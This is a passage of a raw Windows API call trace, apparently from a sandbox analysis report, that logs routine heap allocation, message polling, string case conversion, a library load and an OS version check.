cAlternateFileName="8VMS~1.DOC")) returned 0xaa5860 [0260.847] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0260.847] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0260.848] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0260.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0260.848] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0260.848] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0260.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0260.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0260.848] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0260.848] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.848] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0260.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0260.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0260.848] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0260.848] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0260.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0260.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0260.849] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0260.849] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0260.849] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0260.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0260.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0260.849] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0260.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0260.849] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0260.850] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0260.850] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0260.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0260.850] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0260.850] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0260.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.850] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0260.850] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.850] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0260.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0260.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.851] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.851] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0260.851] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0260.851] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0260.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0260.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.851] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0260.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0260.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0260.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0260.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ee8 [0260.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0260.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0260.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0260.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0260.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0260.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0260.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0260.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0260.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0260.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0260.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0260.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0260.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0260.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0260.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0260.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0260.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0260.853] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0260.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0260.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0260.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0260.853] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0260.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0260.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ed0 [0260.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0260.853] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0260.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0260.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0260.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0260.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0260.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0260.854] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0260.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0260.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0260.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0260.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0260.854] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0260.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0260.855] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0260.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0260.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0260.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0260.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0260.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0260.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0260.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0260.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0260.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0260.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0260.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0260.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0260.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0260.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0260.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0260.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0260.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0260.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0260.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0260.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0260.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0260.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0260.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0260.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0260.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0260.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0260.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0260.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0260.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0260.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0260.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0260.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0260.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0260.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0260.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0260.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0260.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0260.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0260.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0260.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0260.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0260.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0260.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0260.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0260.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0260.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0260.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0260.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0260.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0260.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0260.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0260.859] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0260.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0260.860] HeapFree (in: 